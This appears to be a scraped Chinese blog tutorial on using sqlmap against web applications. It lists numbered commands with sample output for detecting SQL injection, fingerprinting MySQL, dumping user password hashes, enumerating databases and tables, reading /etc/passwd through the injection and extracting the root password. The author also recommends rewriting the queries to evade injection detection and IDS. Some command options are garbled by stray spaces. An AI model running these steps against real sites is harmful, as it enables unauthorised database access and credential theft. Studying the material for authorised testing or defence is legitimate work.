安装sqlmap时出现的问题 最后出现 No module named thirdparty.clientfo...
发布时间:2022-04-26 19:49
时间:2022-04-09 01:51
昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设 备。 稍晚一下,我编译一个dos版本的给你们。
1、首先安装python2.5。 2、然后进入sqlmap的目录,执行sqlmap
1、sqlmap -u 注入点 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度 3、 python sqlmap.py -u "" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT('5', '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH('5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL >= 5.0.0
python sqlmap.py -u "" -v 1 -p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable [...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "" -v 1 -p "cat,id"
5、指定方法和post的数据 python sqlmap.py -u "" --method "POST" -- data "id=1&cat=2"
6、指定cookie,可以注入一些需要登录的地址 python sqlmap.py -u "" --cookie "COOKIE_VALUE"
7、通过代理注入 python sqlmap.py -u "" --proxy "" 8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断 python sqlmap.py -u "" --string "STRING_ON_TRUE_PAGE" 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 --remote-dbms 10、指纹判别数据库类型 python sqlmap.py -u "" -v 1 -f 11、获取banner信息 python sqlmap.py -u "" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。 python sqlmap.py -u "" -- current-db
current database: 'testdb'
python sqlmap.py -u "" --users
database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'' [*] 'root'@'leboyer' [*] 'root'@'localhost' [*] 'testuser'@'localhost'
python sqlmap.py -u "" -- passwords
database management system users password hashes: [*] debian-sys-maint [1]: password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u "" --dbs
available databases [3]: [*] information_schema [*] mysql [*] testdb
python sqlmap.py -u "" --tables -D "information_schema"
Database: information_schema [16 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLLATIONS | | COLUMN_PRIVILEGES | | COLUMNS | | KEY_COLUMN_USAGE | | ROUTINES | | SCHEMA_PRIVILEGES | | SCHEMATA | | STATISTICS | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+
python sqlmap.py -u "" -- columns -T "user" -D "mysql"
Database: mysql Table: user [37 columns] +-----------------------+------+ | Column | Type | +-----------------------+------+ | Alter_priv | enum | | Alter_routine_priv | enum | | Create_priv | enum | | Create_routine_priv | enum | | Create_tmp_table_priv | enum | | Create_user_priv | enum | | Create_view_priv | enum | | Delete_priv | enum | | Drop_priv | enum | | Execute_priv | enum | | File_priv | enum | | Grant_priv | enum | | Host | char | | Index_priv | enum | | Insert_priv | enum | | Lock_tables_priv | enum | | max_connections | int | | max_questions | int | | max_updates | int | | max_user_connections | int | | Password | char | | Process_priv | enum | | References_priv | enum | | Reload_priv | enum | | Repl_client_priv | enum | | Repl_slave_priv | enum | | Select_priv | enum | | Show_db_priv | enum | | Show_view_priv | enum | | Shutdown_priv | enum | | ssl_cipher | blob | | ssl_type | enum | | Super_priv | enum | | Update_priv | enum | | User | char | | x509_issuer | blob | | x509_subject | blob | +-----------------------+------+
13、显示指定的文件内容,一般用于php python sqlmap.py -u "" --file / etc/passwd
/etc/passwd: --- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash ---
python sqlmap.py -u "" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY'
15、union注入 python sqlmap.py -u "" --union- check
valid union: ' UNION ALL SELECT NULL, NULL, NULL--&cat=2'
python sqlmap.py -u "" -v 1 -- union-use --banner
[...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "" -v 1 -b - o "sqlmap.log"
[...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "" -v 1 -- banner -o "sqlmap.log" --resume
[...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner: